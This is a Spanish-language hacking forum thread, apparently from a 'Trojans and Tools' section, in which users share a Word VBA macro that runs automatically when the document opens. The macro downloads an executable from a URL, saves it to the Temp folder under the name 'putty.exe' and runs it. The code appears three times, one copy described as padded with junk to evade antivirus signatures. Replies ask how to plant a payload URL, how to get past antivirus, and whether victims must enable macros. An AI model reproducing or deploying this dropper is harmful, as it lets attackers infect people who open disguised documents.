Con este macro le agregas la url del archivo exe a descargar y este de lo descarga y executa. Funciona para 32 y 64 bits.
#If Win64 Then
 
Private Declare PtrSafe Sub URLDownloadToFileA Lib "Urlmon.dll" (ByVal pCaller As Long, ByVal szURL As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, ByVal lpfnCB As Long)
 
#Else
 
Private Declare Sub URLDownloadToFileA Lib "Urlmon.dll" (ByVal pCaller As Long, ByVal szURL As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, ByVal lpfnCB As Long)
 
#End If
 
 
Sub ToggleHyperlinkCtrlClick()
    Options.CtrlClickHyperlinkToOpen = Not Options.CtrlClickHyperlinkToOpen
End Sub
Sub Document_Open()

 
    DownloadAndExecute
End Sub
 
 
 
 
Sub DownloadAndExecute()
	Dim URL AS String
	Dim FILE AS String
	URL = "http://192.168.0.2/hfs287.exe"
    FILE = Environ("Temp") & "\" & "putty" & ".exe"
    URLDownloadToFileA 0, URL, FILE, 0, 0

    If Len(Dir(FILE)) > 0 Then

        Shell FILE, vbNormalFocus
    End If
 
End Sub
Que bueno
Gracias por traerlo
666699966999999996699966699999
666699966999999996699966969999
699999966999999996699966996999
666699966999999996699966999699
666699966999999996699966999699
699999996699999966999966996999
699999999669999669999966969999
699999999996666999999966699999
https://reversecodes.wordpress.com

http://indeseables.github.io/
esta buenisimo y si funciona,pero el puto nod de yahoo me lo blockea. Que se puede hacer?
Aceptando donaciones..gracias: 1CiVFiGwCtf1kpASyQB9j8dhNyJs5AfaMX
kakarudo123 escribió:En que parte le agregas la url del archivo???

perdon mi ignorancia, pero ya agregue la macro a un documento de word, y nose como hacer para que funcione, que se hace despues de crear la macro?? en que parte se pone la url de la pagina donde esta alojado el ¨programilla¨ a descargarr??? cuando se descarga se ejecuta solo??? subi una bolita a sendspace y puse la url en la parte en blanco del documento de word, estoy muy desorientado.... alguien que me ayude por favor!! gracias
Para que no le entienda al codigo de arriba aqui esta la version limpia, es que la otra le metieron basura para quitar firmas.
#If Win64 Then
 
Private Declare PtrSafe Sub URLDownloadToFileA Lib "Urlmon.dll" (ByVal pCaller As Long, ByVal szURL As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, ByVal lpfnCB As Long)
 
#Else
 
Private Declare Sub URLDownloadToFileA Lib "Urlmon.dll" (ByVal pCaller As Long, ByVal szURL As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, ByVal lpfnCB As Long)
 
#End If
 
 
Sub ToggleHyperlinkCtrlClick()
    Options.CtrlClickHyperlinkToOpen = Not Options.CtrlClickHyperlinkToOpen
End Sub
Sub Document_Open()

 
    DownloadAndExecute
End Sub
 
 
 
 
Sub DownloadAndExecute()
	Dim URL AS String
	Dim FILE AS String
	URL = "http://192.168.0.2/hfs287.exe"
    FILE = Environ("Temp") & "\" & "putty" & ".exe"
    URLDownloadToFileA 0, URL, FILE, 0, 0

    If Len(Dir(FILE)) > 0 Then

        Shell FILE, vbNormalFocus
    End If
 
End Sub
Algun moderaror que edite el post principal y coloque esta.
"Concentrarse en las fortalezas, reconocer las debilidades, las oportunidades y tomar la guardia contra las amenazas."

―Sun Tzu
adwind escribió:Para que no le entienda al codigo de arriba aqui esta la version limpia, es que la otra le metieron basura para quitar firmas.
#If Win64 Then
 
Private Declare PtrSafe Sub URLDownloadToFileA Lib "Urlmon.dll" (ByVal pCaller As Long, ByVal szURL As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, ByVal lpfnCB As Long)
 
#Else
 
Private Declare Sub URLDownloadToFileA Lib "Urlmon.dll" (ByVal pCaller As Long, ByVal szURL As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, ByVal lpfnCB As Long)
 
#End If
 
 
Sub ToggleHyperlinkCtrlClick()
    Options.CtrlClickHyperlinkToOpen = Not Options.CtrlClickHyperlinkToOpen
End Sub
Sub Document_Open()

 
    DownloadAndExecute
End Sub
 
 
 
 
Sub DownloadAndExecute()
	Dim URL AS String
	Dim FILE AS String
	URL = "http://192.168.0.2/hfs287.exe"
    FILE = Environ("Temp") & "\" & "putty" & ".exe"
    URLDownloadToFileA 0, URL, FILE, 0, 0

    If Len(Dir(FILE)) > 0 Then

        Shell FILE, vbNormalFocus
    End If
 
End Sub
Algun moderaror que edite el post principal y coloque esta.
Hecho.

//Regard.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
Hey que tal? Este exploit funciona con las ultimas versiones de office? No me creo que en word todavia se pueda hacer esto sin que se detecte por parte del usuario remoto!

Siempre buscandonos las tramas e.e
¡Atención! LuisN2.com ha caido, pero el blog sigue estando en www.luisn2indetectables.blogspot.com o www.LuisN2.cz.cc
Hola, una pregunta, pero la persona que abra el word debe ejecutar el macros, o se hace de manera automatica al ejecutar el word?
Responder

Volver a “Troyanos y Herramientas”